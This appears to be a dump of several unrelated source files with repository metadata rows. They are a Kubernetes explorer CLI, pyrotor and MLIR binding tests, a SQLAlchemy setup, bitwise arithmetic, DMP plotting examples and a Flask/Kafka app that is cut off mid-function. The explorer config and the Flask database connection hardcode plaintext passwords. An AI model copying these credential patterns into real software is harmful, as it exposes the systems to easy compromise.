return hiss.hiss('cannot create explorer config in %s' % pods[0])
def setup_explorer():
hiss.echo('Generate explorer config')
config = generate_explorer_config()
    create_explorer_config_in_efs(config)
hiss.echo('Deploy explorer')
# Get domain
explorer_namespace = get_namespace()
# Create temp folder & namespace
settings.k8s.prereqs(explorer_namespace)
dict_env = {
'DOMAIN': explorer_namespace,
'DATABASE_PASSWORD': 'Akachain',
'EFS_SERVER': settings.EFS_SERVER,
'EFS_PATH': settings.EFS_PATH,
'EFS_EXTEND': settings.EFS_EXTEND,
'PVS_PATH': settings.PVS_PATH
}
# Deploy explorer db sts
explorer_template = '%s/explorer/explorer-deployment.yaml' % util.get_k8s_template_path()
settings.k8s.apply_yaml_from_template(
namespace=explorer_namespace, k8s_template_file=explorer_template, dict_env=dict_env)
# Deploy explorer db svc
explorer_svc_template = '%s/explorer/explorer-service.yaml' % util.get_k8s_template_path()
settings.k8s.apply_yaml_from_template(
namespace=explorer_namespace, k8s_template_file=explorer_svc_template, dict_env=dict_env)
def del_explorer_db():
# Delete sts
return settings.k8s.delete_stateful(name='explorer-db', namespace=get_namespace(), delete_pvc=True)
def del_explorer():
# Delete sts
return settings.k8s.delete_stateful(name='explorerpod', namespace=get_namespace())
@click.group()
def explorer():
"""Explorer"""
pass
@explorer.command('setup', short_help="Setup explorer")
def setup():
hiss.rattle('Setup explorer DB')
setup_explorer_db()
hiss.rattle('Setup explorer')
setup_explorer()
@explorer.command('delete', short_help="Delete explorer")
def delete():
hiss.rattle('Delete explorer DB')
del_explorer_db()
hiss.rattle('Delete explorer')
del_explorer()
| 33.84585 | 158 | 0.615322 | 984 | 8,563 | 5.136179 | 0.178862 | 0.051444 | 0.030075 | 0.024931 | 0.490107 | 0.416304 | 0.339533 | 0.296795 | 0.240602 | 0.219628 | 0 | 0.010044 | 0.255868 | 8,563 | 252 | 159 | 33.980159 | 0.783114 | 0.041925 | 0 | 0.175258 | 0 | 0 | 0.211814 | 0.084628 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051546 | false | 0.015464 | 0.051546 | 0.010309 | 0.139175 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8f2ac3c2bd8f9643692095e9f312a23460f27eb | 3,089 | py | Python | tests/test_iterations.py | bguedj/pyrotor | 31620de00f69d4ff2e0c4c8b03f38f80742c1d44 | [
"MIT"
] | 9 | 2020-11-13T14:38:39.000Z | 2022-03-17T08:51:48.000Z | tests/test_iterations.py | bguedj/pyrotor | 31620de00f69d4ff2e0c4c8b03f38f80742c1d44 | [
"MIT"
] | null | null | null | tests/test_iterations.py | bguedj/pyrotor | 31620de00f69d4ff2e0c4c8b03f38f80742c1d44 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Test the iterations module
"""

import unittest

import pytest
import mock
import numpy as np

from pyrotor.iterations import get_kappa_boundaries
from pyrotor.iterations import compute_kappa_max
from pyrotor.iterations import compute_kappa_mean
from pyrotor.iterations import binary_search_best_trajectory
from pyrotor.iterations import iterate_through_kappas


def test_get_kappa_boundaries():
    # TODO: Test when model is sklearn model
    x = np.array([[1, 2], [1, 2]])
    Q = np.array([[1, 2], [3, 4]])
    W = np.array([2, 3])
    model = [W, Q]
    sigma_inverse = np.array([[1, 2], [3, 4]])
    c_weight = np.array([1, 1])
    expected_kappa_min = 0
    expected_kappa_max = 0.4
    opti_factor = 2
    basis = 'legendre'
    basis_dimension = {"A": 1, "B": 1}
    basis_features = basis_dimension
    independent_variable = {'start': 0, 'end': 1, 'points_nb': 2}
    extra_info = {'basis': basis,
                  'basis_dimension': basis_dimension,
                  'basis_features': basis_features,
                  'independent_variable': independent_variable}

    kappa_min, kappa_max = get_kappa_boundaries(x, model,
                                                sigma_inverse, c_weight,
                                                opti_factor, extra_info)

    assert kappa_min == expected_kappa_min
    assert kappa_max == expected_kappa_max


def test_compute_kappa_max():
    # the function under test returns kappa_max, so name the locals accordingly
    kappa_mean = 1
    expected_kappa_max = 2
    opti_factor = 2

    kappa_max = compute_kappa_max(kappa_mean, opti_factor)

    assert kappa_max == expected_kappa_max


def test_compute_kappa_mean():
    f_0 = 1
    g_0 = 2
    expected_kappa_mean = 0.5

    kappa_mean = compute_kappa_mean(f_0, g_0)

    assert kappa_mean == expected_kappa_mean


class TestTrajectoryIterations(unittest.TestCase):

    def setUp(self):
        self.trajectory = mock.Mock()
        self.i_call = 0

    def fake_compute_trajectory(self):
        self.i_call += 1
        if self.i_call == 2:
            self.trajectory.is_valid = True

    def test_binary_search_best_trajectory(self):
        self.trajectory.i_binary_search = 0
        # case 1: i < 0 -> ValueError as we can't find a solution to this
        # optimization
        with pytest.raises(ValueError):
            binary_search_best_trajectory(self.trajectory, -1, 5, False)
        # case 2:
        self.trajectory.is_valid = True
        self.trajectory.original_weights = [0, 1, 2]
        self.trajectory.kappas = [1, 2, 3]
        self.i_call = 0
        self.trajectory.compute_trajectory = self.fake_compute_trajectory
        binary_search_best_trajectory(self.trajectory, 2, 0, False)
        assert self.i_call == 0
        # FIXME: to test when required dependencies tested
        # # case 3:
        # i_call = 0
        # trajectory.is_valid = False
        # trajectory.compute_trajectory = self.fake_compute_trajectory
        # binary_search_best_trajectory(optimization, 2, 0)
        # assert i_call > 1

    def test_iterate_through_kappas(self):
        pass
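        # A sketch of what this could eventually assert (hypothetical: the
        # exact signature of iterate_through_kappas is not pinned down by the
        # imports above, so this stays commented out):
        # self.trajectory.kappas = [0.1, 1.0, 10.0]
        # self.trajectory.compute_trajectory = self.fake_compute_trajectory
        # iterate_through_kappas(self.trajectory, ...)
        # assert self.trajectory.is_valid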
| 30.584158 | 73 | 0.646164 | 406 | 3,089 | 4.635468 | 0.258621 | 0.043039 | 0.055792 | 0.071732 | 0.284803 | 0.22423 | 0.082891 | 0.082891 | 0.082891 | 0.082891 | 0 | 0.026754 | 0.261897 | 3,089 | 100 | 74 | 30.89 | 0.798684 | 0.135643 | 0 | 0.123077 | 0 | 0 | 0.030578 | 0 | 0 | 0 | 0 | 0.01 | 0.076923 | 1 | 0.107692 | false | 0.015385 | 0.138462 | 0 | 0.261538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8f3a3840497a4d3eb2f4ea9b41d1a248b569e7d | 5,659 | py | Python | mlir/test/Bindings/Python/ir_types.py | rarutyun/llvm | 76fa6b3bcade074bdedef740001c4528e1aa08a8 | [
"Apache-2.0"
] | null | null | null | mlir/test/Bindings/Python/ir_types.py | rarutyun/llvm | 76fa6b3bcade074bdedef740001c4528e1aa08a8 | [
"Apache-2.0"
] | null | null | null | mlir/test/Bindings/Python/ir_types.py | rarutyun/llvm | 76fa6b3bcade074bdedef740001c4528e1aa08a8 | [
"Apache-2.0"
] | null | null | null | # RUN: %PYTHON %s | FileCheck %s

import mlir


def run(f):
  print("\nTEST:", f.__name__)
  f()


# CHECK-LABEL: TEST: testParsePrint
def testParsePrint():
  ctx = mlir.ir.Context()
  t = ctx.parse_type("i32")
  # CHECK: i32
  print(str(t))
  # CHECK: Type(i32)
  print(repr(t))

run(testParsePrint)


# CHECK-LABEL: TEST: testParseError
# TODO: Hook the diagnostic manager to capture a more meaningful error
# message.
def testParseError():
  ctx = mlir.ir.Context()
  try:
    t = ctx.parse_type("BAD_TYPE_DOES_NOT_EXIST")
  except ValueError as e:
    # CHECK: Unable to parse type: 'BAD_TYPE_DOES_NOT_EXIST'
    print("testParseError:", e)
  else:
    print("Exception not produced")

run(testParseError)


# CHECK-LABEL: TEST: testTypeEq
def testTypeEq():
  ctx = mlir.ir.Context()
  t1 = ctx.parse_type("i32")
  t2 = ctx.parse_type("f32")
  t3 = ctx.parse_type("i32")
  # CHECK: t1 == t1: True
  print("t1 == t1:", t1 == t1)
  # CHECK: t1 == t2: False
  print("t1 == t2:", t1 == t2)
  # CHECK: t1 == t3: True
  print("t1 == t3:", t1 == t3)
  # CHECK: t1 == None: False
  print("t1 == None:", t1 == None)

run(testTypeEq)


# CHECK-LABEL: TEST: testTypeEqDoesNotRaise
def testTypeEqDoesNotRaise():
  ctx = mlir.ir.Context()
  t1 = ctx.parse_type("i32")
  not_a_type = "foo"
  # CHECK: False
  print(t1 == not_a_type)
  # CHECK: False
  print(t1 == None)
  # CHECK: True
  print(t1 != None)

run(testTypeEqDoesNotRaise)


# CHECK-LABEL: TEST: testStandardTypeCasts
def testStandardTypeCasts():
  ctx = mlir.ir.Context()
  t1 = ctx.parse_type("i32")
  tint = mlir.ir.IntegerType(t1)
  tself = mlir.ir.IntegerType(tint)
  # CHECK: Type(i32)
  print(repr(tint))
  try:
    tillegal = mlir.ir.IntegerType(ctx.parse_type("f32"))
  except ValueError as e:
    # CHECK: ValueError: Cannot cast type to IntegerType (from Type(f32))
    print("ValueError:", e)
  else:
    print("Exception not produced")

run(testStandardTypeCasts)


# CHECK-LABEL: TEST: testIntegerType
def testIntegerType():
  ctx = mlir.ir.Context()
  i32 = mlir.ir.IntegerType(ctx.parse_type("i32"))
  # CHECK: i32 width: 32
  print("i32 width:", i32.width)
  # CHECK: i32 signless: True
  print("i32 signless:", i32.is_signless)
  # CHECK: i32 signed: False
  print("i32 signed:", i32.is_signed)
  # CHECK: i32 unsigned: False
  print("i32 unsigned:", i32.is_unsigned)
  s32 = mlir.ir.IntegerType(ctx.parse_type("si32"))
  # CHECK: s32 signless: False
  print("s32 signless:", s32.is_signless)
  # CHECK: s32 signed: True
  print("s32 signed:", s32.is_signed)
  # CHECK: s32 unsigned: False
  print("s32 unsigned:", s32.is_unsigned)
  u32 = mlir.ir.IntegerType(ctx.parse_type("ui32"))
  # CHECK: u32 signless: False
  print("u32 signless:", u32.is_signless)
  # CHECK: u32 signed: False
  print("u32 signed:", u32.is_signed)
  # CHECK: u32 unsigned: True
  print("u32 unsigned:", u32.is_unsigned)
  # CHECK: signless: i16
  print("signless:", mlir.ir.IntegerType.get_signless(ctx, 16))
  # CHECK: signed: si8
  print("signed:", mlir.ir.IntegerType.get_signed(ctx, 8))
  # CHECK: unsigned: ui64
  print("unsigned:", mlir.ir.IntegerType.get_unsigned(ctx, 64))

run(testIntegerType)


# CHECK-LABEL: TEST: testIndexType
def testIndexType():
  ctx = mlir.ir.Context()
  # CHECK: index type: index
  print("index type:", mlir.ir.IndexType(ctx))

run(testIndexType)


# CHECK-LABEL: TEST: testFloatType
def testFloatType():
  ctx = mlir.ir.Context()
  # CHECK: float: bf16
  print("float:", mlir.ir.BF16Type(ctx))
  # CHECK: float: f16
  print("float:", mlir.ir.F16Type(ctx))
  # CHECK: float: f32
  print("float:", mlir.ir.F32Type(ctx))
  # CHECK: float: f64
  print("float:", mlir.ir.F64Type(ctx))

run(testFloatType)


# CHECK-LABEL: TEST: testNoneType
def testNoneType():
  ctx = mlir.ir.Context()
  # CHECK: none type: none
  print("none type:", mlir.ir.NoneType(ctx))

run(testNoneType)


# CHECK-LABEL: TEST: testComplexType
def testComplexType():
  ctx = mlir.ir.Context()
  complex_i32 = mlir.ir.ComplexType(ctx.parse_type("complex<i32>"))
  # CHECK: complex type element: i32
  print("complex type element:", complex_i32.element_type)
  f32 = mlir.ir.F32Type(ctx)
  # CHECK: complex type: complex<f32>
  print("complex type:", mlir.ir.ComplexType.get_complex(f32))
  index = mlir.ir.IndexType(ctx)
  try:
    complex_invalid = mlir.ir.ComplexType.get_complex(index)
  except ValueError as e:
    # CHECK: invalid 'Type(index)' and expected floating point or integer type.
    print(e)
  else:
    print("Exception not produced")

run(testComplexType)


# CHECK-LABEL: TEST: testVectorType
def testVectorType():
  ctx = mlir.ir.Context()
  f32 = mlir.ir.F32Type(ctx)
  shape = [2, 3]
  # CHECK: vector type: vector<2x3xf32>
  print("vector type:", mlir.ir.VectorType.get_vector(shape, f32))
  index = mlir.ir.IndexType(ctx)
  try:
    vector_invalid = mlir.ir.VectorType.get_vector(shape, index)
  except ValueError as e:
    # CHECK: invalid 'Type(index)' and expected floating point or integer type.
    print(e)
  else:
    print("Exception not produced")

run(testVectorType)


# CHECK-LABEL: TEST: testTupleType
def testTupleType():
  ctx = mlir.ir.Context()
  i32 = mlir.ir.IntegerType(ctx.parse_type("i32"))
  f32 = mlir.ir.F32Type(ctx)
  vector = mlir.ir.VectorType(ctx.parse_type("vector<2x3xf32>"))
  l = [i32, f32, vector]
  tuple_type = mlir.ir.TupleType.get_tuple(ctx, l)
  # CHECK: tuple type: tuple<i32, f32, vector<2x3xf32>>
  print("tuple type:", tuple_type)
  # CHECK: number of types: 3
  print("number of types:", tuple_type.num_types)
  # CHECK: pos-th type in the tuple type: f32
  print("pos-th type in the tuple type:", tuple_type.get_type(1))

run(testTupleType)
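
# A further sketch in the same style (an assumption: shaped types such as
# memref round-trip through Context.parse_type just like the types above do;
# kept commented out so the FileCheck expectations above stay unchanged):
# def testParseMemRef():
#   ctx = mlir.ir.Context()
#   t = ctx.parse_type("memref<2x3xf32>")
#   print("memref type:", t)
# run(testParseMemRef)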
| 26.32093 | 79 | 0.684397 | 786 | 5,659 | 4.85369 | 0.165394 | 0.06291 | 0.044037 | 0.050328 | 0.302752 | 0.221494 | 0.174836 | 0.115596 | 0.115596 | 0.089646 | 0 | 0.044049 | 0.165577 | 5,659 | 214 | 80 | 26.443925 | 0.763871 | 0.288213 | 0 | 0.327869 | 0 | 0 | 0.136169 | 0.005789 | 0 | 0 | 0 | 0.004673 | 0 | 1 | 0.106557 | false | 0 | 0.008197 | 0 | 0.114754 | 0.360656 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8f40e675815c796a01caa3a7939e40cfb63bac7 | 1,050 | py | Python | lsf/database/__init__.py | unknownkz/LynxSuperFederation | 010c90100ca9599e972d0a3c45f04c38cad0a31e | [
"MIT"
] | 7 | 2022-02-02T01:56:06.000Z | 2022-03-08T01:51:53.000Z | lsf/database/__init__.py | unknownkz/LynxSuperFederation | 010c90100ca9599e972d0a3c45f04c38cad0a31e | [
"MIT"
] | null | null | null | lsf/database/__init__.py | unknownkz/LynxSuperFederation | 010c90100ca9599e972d0a3c45f04c38cad0a31e | [
"MIT"
] | 1 | 2022-02-02T02:33:04.000Z | 2022-02-02T02:33:04.000Z | import atexit
import sys

from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import scoped_session, sessionmaker

from .. import DATABASE_URL
from .. import LOGGER as LSF_LOGS

if DATABASE_URL and DATABASE_URL.startswith("postgres://"):
    DATABASE_URL = DATABASE_URL.replace("postgres://", "postgresql://", 1)


def start() -> scoped_session:
    machine = create_engine(DATABASE_URL, echo=True)
    LSF_LOGS.info("[PostgreSQL] Connecting to database...")
    BASE.metadata.bind = machine
    BASE.metadata.create_all(machine, checkfirst=True)
    return scoped_session(sessionmaker(bind=machine, autoflush=True, autocommit=False, expire_on_commit=True))


try:
    BASE = declarative_base()
    SESSION = start()
    LSF_LOGS.info("[PostgreSQL] Connection successful, session started.")
    SESSION.commit()
    sys.stdout.flush()
    # dispose of the scoped session on interpreter exit (registering the
    # session object itself would not perform any cleanup)
    atexit.register(SESSION.remove)
except Exception as e:
    LSF_LOGS.exception(f"[PostgreSQL] Failed to connect due to {e}")
finally:
    # guard against SESSION being unbound when start() failed above
    if "SESSION" in globals():
        SESSION.close()
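
# Minimal usage sketch (the model below is hypothetical; BASE and SESSION are
# the objects defined in this module):
#
#   from sqlalchemy import Column, Integer
#
#   class Example(BASE):
#       __tablename__ = "example"
#       id = Column(Integer, primary_key=True)
#
#   SESSION.add(Example())
#   SESSION.commit()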
| 29.166667 | 110 | 0.748571 | 132 | 1,050 | 5.80303 | 0.469697 | 0.086162 | 0.065274 | 0.05483 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001112 | 0.14381 | 1,050 | 35 | 111 | 30 | 0.850945 | 0 | 0 | 0 | 0 | 0 | 0.16 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.269231 | 0 | 0.346154 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8fa19ce3b5416c38174ee4932db546534bd234b | 1,801 | py | Python | problems/arithmetic.py | chrisxue815/leetcode_python | dec3c160d411a5c19dc8e9d96e7843f0e4c36820 | [
"Unlicense"
] | 1 | 2017-06-17T23:47:17.000Z | 2017-06-17T23:47:17.000Z | problems/arithmetic.py | chrisxue815/leetcode_python | dec3c160d411a5c19dc8e9d96e7843f0e4c36820 | [
"Unlicense"
] | null | null | null | problems/arithmetic.py | chrisxue815/leetcode_python | dec3c160d411a5c19dc8e9d96e7843f0e4c36820 | [
"Unlicense"
] | null | null | null | import unittest


def add(a, b):
    a &= 0xFFFFFFFF
    b &= 0xFFFFFFFF
    while b:
        a, b = a ^ b, ((a & b) << 1)
    if a & 0x80000000:
        a |= -0x80000000
    else:
        a &= 0xFFFFFFFF
    return a


def sub(a, b):
    return add(a, add(~b, 1))


def mul(a, b):
    if not a or not b:
        return 0
    if a == 1:
        return b
    if b == 1:
        return a

    pos = (a < 0) == (b < 0)
    if a < 0:
        a = -a
    if b < 0:
        b = -b

    result = 0
    while b != 1:
        if b & 1:
            result += a
        a <<= 1
        b >>= 1
    result += a

    return result if pos else -result


def div(a, b):
    if not b:
        return float('inf')
    if not a:
        return 0

    pos = (a < 0) == (b < 0)
    if a < 0:
        a = -a
    if b < 0:
        b = -b

    result = 0
    for i in range(31, -1, -1):
        if a >> i >= b:
            result += 1 << i
            a -= b << i

    return result if pos else -result
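
# Worked example of the carry-propagation loop in add() above, for 5 + 3:
#   a=0b101, b=0b011
#   step 1: a^b=0b110 (partial sum), (a&b)<<1=0b010 (carry)
#   step 2: a^b=0b100,               carry=0b100
#   step 3: a^b=0b000,               carry=0b1000
#   step 4: a^b=0b1000,              carry=0  ->  add(5, 3) == 8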

class Test(unittest.TestCase):
    def test(self):
        for i in range(20):
            for j in range(20):
                self._test(i, j)

    def _test(self, a, b):
        self._test_arithmetic(a, b)
        self._test_arithmetic(a, -b)
        self._test_arithmetic(-a, b)
        self._test_arithmetic(-a, -b)

    def _test_arithmetic(self, a, b):
        self.assertEqual(a + b, add(a, b))
        self.assertEqual(b + a, add(b, a))
        self.assertEqual(a - b, sub(a, b))
        self.assertEqual(b - a, sub(b, a))
        self.assertEqual(a * b, mul(a, b))
        self.assertEqual(b * a, mul(b, a))
        if b:
            self.assertEqual(int(float(a) / b), div(a, b))
        if a:
            self.assertEqual(int(float(b) / a), div(b, a))


if __name__ == '__main__':
    unittest.main()
unittest.main()
| 18.191919 | 58 | 0.44975 | 274 | 1,801 | 2.883212 | 0.142336 | 0.055696 | 0.060759 | 0.050633 | 0.367089 | 0.358228 | 0.16962 | 0.16962 | 0.16962 | 0.16962 | 0 | 0.046642 | 0.404775 | 1,801 | 98 | 59 | 18.377551 | 0.690299 | 0 | 0 | 0.305556 | 0 | 0 | 0.006108 | 0 | 0 | 0 | 0.027762 | 0 | 0.111111 | 1 | 0.097222 | false | 0 | 0.013889 | 0.013889 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8fc72a3f584f848048bd8a428067db601aaf3e3 | 4,894 | py | Python | examples/models/dmp.py | Pandinosaurus/pyrobolearn | 9cd7c060723fda7d2779fa255ac998c2c82b8436 | [
"Apache-2.0"
] | 2 | 2021-01-21T21:08:30.000Z | 2022-03-29T16:45:49.000Z | examples/models/dmp.py | Pandinosaurus/pyrobolearn | 9cd7c060723fda7d2779fa255ac998c2c82b8436 | [
"Apache-2.0"
] | null | null | null | examples/models/dmp.py | Pandinosaurus/pyrobolearn | 9cd7c060723fda7d2779fa255ac998c2c82b8436 | [
"Apache-2.0"
] | 1 | 2020-09-29T21:25:39.000Z | 2020-09-29T21:25:39.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Provide some examples using DMPs.
"""

from pyrobolearn.models.dmp import *


# tests canonical systems
discrete_cs = DiscreteCS()
rhythmic_cs = RhythmicCS()

# plot canonical systems
plt.subplot(1, 2, 1)
plt.title('Discrete CS')
for tau in [1., 0.5, 2.]:
    rollout = discrete_cs.rollout(tau=tau)
    plt.plot(np.linspace(0, 1., len(rollout)), rollout, label='tau=' + str(tau))
plt.legend()

plt.subplot(1, 2, 2)
plt.title('Rhythmic CS')
for tau in [1., 0.5, 2.]:
    rollout = rhythmic_cs.rollout(tau=tau)
    plt.plot(np.linspace(0, 1., len(rollout)), rollout, label='tau=' + str(tau))
plt.legend()
plt.show()

# tests basis functions
num_basis = 20
discrete_f = DiscreteForcingTerm(discrete_cs, num_basis)
rhythmic_f = RhythmicForcingTerm(rhythmic_cs, num_basis)

plt.subplot(1, 2, 1)
rollout = discrete_cs.rollout()
plt.title('discrete basis fcts')
plt.plot(rollout, discrete_f.psi(rollout))

plt.subplot(1, 2, 2)
rollout = rhythmic_cs.rollout()
plt.title('rhythmic basis fcts')
plt.plot(rollout, rhythmic_f.psi(rollout))
plt.show()

# tests forcing terms
f = np.sin(np.linspace(0, 2 * np.pi, 100))
discrete_f.train(f, plot=True)

f = np.sin(np.linspace(0, 2 * np.pi, int(2 * np.pi * 100)))
rhythmic_f.train(f, plot=True)

# Test discrete DMP
discrete_dmp = DiscreteDMP(num_dmps=1, num_basis=num_basis)
t = np.linspace(-6, 6, 100)
y_target = 1 / (1 + np.exp(-t))
discrete_dmp.imitate(y_target)
y, dy, ddy = discrete_dmp.rollout()

plt.plot(y_target, label='y_target')
plt.plot(y[0], label='y_pred')
# plt.plot(dy[0])
# plt.plot(ddy[0])

y, dy, ddy = discrete_dmp.rollout(new_goal=np.array([2.]))
plt.plot(y[0], label='y_scaled')
plt.title('Discrete DMP')
plt.legend()
plt.show()

# tests basis functions
num_basis = 100

# Test Biologically-inspired DMP
t = np.linspace(0., 1., 100)
y_d = np.sin(np.pi * t)
new_goal = np.array([[0.8, -0.25],
                     [0.8, 0.25],
                     [1.2, -0.25]])

discrete_dmp = DiscreteDMP(num_dmps=2, num_basis=num_basis)
discrete_dmp.imitate(np.array([t, y_d]))
y, dy, ddy = discrete_dmp.rollout()
init_points = np.array([discrete_dmp.y0, discrete_dmp.goal])
# print(discrete_dmp.generate_goal())
# print(discrete_dmp.generate_goal(f0=discrete_dmp.f_target[:,0]))

# check with standard discrete DMP when rescaling the goal
plt.subplot(1, 3, 1)
plt.title('Initial discrete DMP')
plt.scatter(init_points[:, 0], init_points[:, 1], color='b')
plt.scatter(new_goal[:, 0], new_goal[:, 1], color='r')
plt.plot(y[0], y[1], 'b', label='original')

plt.subplot(1, 3, 2)
plt.title('Rescaled discrete DMP')
plt.scatter(init_points[:, 0], init_points[:, 1], color='b')
plt.scatter(new_goal[:, 0], new_goal[:, 1], color='r')
plt.plot(y[0], y[1], 'b', label='original')
for g in new_goal:
    y, dy, ddy = discrete_dmp.rollout(new_goal=g)
    plt.plot(y[0], y[1], 'g', label='scaled')
plt.legend(['original', 'scaled'])

# change goal with biologically-inspired DMP
new_goal = np.array([[0.8, -0.25],
                     [0.8, 0.25],
                     [0.4, 0.1],
                     [5., 0.15],
                     [1.2, -0.25],
                     [-0.8, 0.1],
                     [-0.8, -0.25],
                     [5., -0.25]])

bio_dmp = BioDiscreteDMP(num_dmps=2, num_basis=num_basis)
bio_dmp.imitate(np.array([t, y_d]))
y, dy, ddy = bio_dmp.rollout()
init_points = np.array([bio_dmp.y0, bio_dmp.goal])

plt.subplot(1, 3, 3)
plt.title('Biologically-inspired DMP')
plt.scatter(init_points[:, 0], init_points[:, 1], color='b')
plt.scatter(new_goal[:, 0], new_goal[:, 1], color='r')
plt.plot(y[0], y[1], 'b', label='original')
for g in new_goal:
    y, dy, ddy = bio_dmp.rollout(new_goal=g)
    plt.plot(y[0], y[1], 'g', label='scaled')
plt.legend(['original', 'scaled'])
plt.show()

# changing goal at the middle
y_list = []
for g in new_goal:
    bio_dmp.reset()
    y_traj = np.zeros((2, 100))
    for t in range(100):
        if t < 30:
            y, dy, ddy = bio_dmp.step()
        else:
            y, dy, ddy = bio_dmp.step(new_goal=g)
        y_traj[:, t] = y
    y_list.append(y_traj)

for y in y_list:
    plt.plot(y[0], y[1])
plt.scatter(bio_dmp.y0[0], bio_dmp.y0[1], color='b')
plt.scatter(new_goal[:, 0], new_goal[:, 1], color='r')
plt.title('change goal at the middle')
plt.show()

# changing goal at the middle but with a moving goal
g = np.hstack((np.arange(1.0, 2.0, 0.1).reshape(10, -1),
               np.arange(0.0, 1.0, 0.1).reshape(10, -1)))
bio_dmp.reset()
y_traj = np.zeros((2, 100))
y_list = []
for t in range(100):
    y, dy, ddy = bio_dmp.step(new_goal=g[int(t / 10)])
    y_traj[:, t] = y
    if (t % 10) == 0:
        y_list.append(y)
y_list = np.array(y_list)

plt.plot(y_traj[0], y_traj[1])
plt.scatter(bio_dmp.y0[0], bio_dmp.y0[1], color='b')
plt.scatter(g[:, 0], g[:, 1], color='r')
plt.scatter(y_list[:, 0], y_list[:, 1], color='g')
plt.title('moving goal')
plt.show()
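
# For reference, the dynamics exercised above follow the standard discrete DMP
# formulation (textbook notation after Ijspeert et al.; pyrobolearn's internal
# parameter names are not assumed here):
#   canonical system:       tau * dx = -alpha_x * x
#   transformation system:  tau * dz = alpha_z * (beta_z * (g - y) - z) + f(x)
#                           tau * dy = z
# where f(x) is the learned forcing term built from the basis functions
# plotted earlier, and rescaling the goal g reshapes the rollout accordingly.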
| 29.130952 | 78 | 0.630772 | 859 | 4,894 | 3.466822 | 0.146682 | 0.066488 | 0.026864 | 0.024177 | 0.602418 | 0.499664 | 0.421088 | 0.384822 | 0.371726 | 0.283747 | 0 | 0.050308 | 0.171434 | 4,894 | 167 | 79 | 29.305389 | 0.684094 | 0.112178 | 0 | 0.419355 | 0 | 0 | 0.06571 | 0.004859 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.008065 | 0 | 0.008065 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8fd55aaa3ed3b16b9a4ac6ecf440894a3b0fc20 | 7,186 | py | Python | skaffold-STABLE/webapp/hello.py | LennartFertig/BigData | e74761b16812fd034519c06897329ea9ba9968df | [
"Apache-2.0"
] | null | null | null | skaffold-STABLE/webapp/hello.py | LennartFertig/BigData | e74761b16812fd034519c06897329ea9ba9968df | [
"Apache-2.0"
] | null | null | null | skaffold-STABLE/webapp/hello.py | LennartFertig/BigData | e74761b16812fd034519c06897329ea9ba9968df | [
"Apache-2.0"
] | 1 | 2021-10-19T07:45:12.000Z | 2021-10-19T07:45:12.000Z | from flask import Flask, render_template, request, redirect, url_for, flash
import emoji
import socket
import time  # needed by timed_producer below
import psycopg2
from pymemcache.client.base import Client
from essential_generators import DocumentGenerator
from kafka import KafkaProducer

# Lennart, 26.8
# from flask_caching import Cache

client = Client('memcached-service')

app = Flask(__name__)


# Test access to the web server
@app.route('/')
def Index():
    return render_template('index.html')


# Test cache server, Lennart, 26.08.
# The connection to the database is already in place.
@app.route('/deployment')
def depl():
    ## Fetch data from the cache server
    cache_result = client.get('flights')
    ## If no data is cached, pull it from the database
    if cache_result is None:  # flights not available
        con = psycopg2.connect("host=postgres port=5432 dbname=kranichairline_db user=postgres password=postgres")
        cur = con.cursor()
        cur.execute("select * from flights")
        data = cur.fetchall()
        cur.close()
        client.set('flights', data)
        return render_template('index3.html', data=data)
    else:
        #### TODO: the output format is still not pretty
        # If available, take the data from the cache
        data = cache_result
        return render_template('index3.html', data=data)
    # except Exception as e:
    #     data = e
    #     return emoji.emojize('Cacheserver ist :poop:', use_aliases=True)


# Function that sends data to the Kafka topic; called when the button is clicked
@app.route('/kafka')
def your_flask_function():
    # Send on click
    producer = KafkaProducer(bootstrap_servers='my-cluster-kafka-bootstrap:9092')
    next_click = "KLICK GEHT"
    # print(f"Sending message: {next_click}")
    future = producer.send("1337datascience", next_click.encode())
    result = future.get(timeout=5)
    # print(f"Result: {result}")
    return emoji.emojize(':thumbsup:', use_aliases=True)


###### Draft
### Alternatively, one could build a page that keeps sending messages to the
# topic as long as the user stays on it, to estimate user interest and raise
# the prices accordingly
@app.route('/zeitbasiert')
def timed_producer():
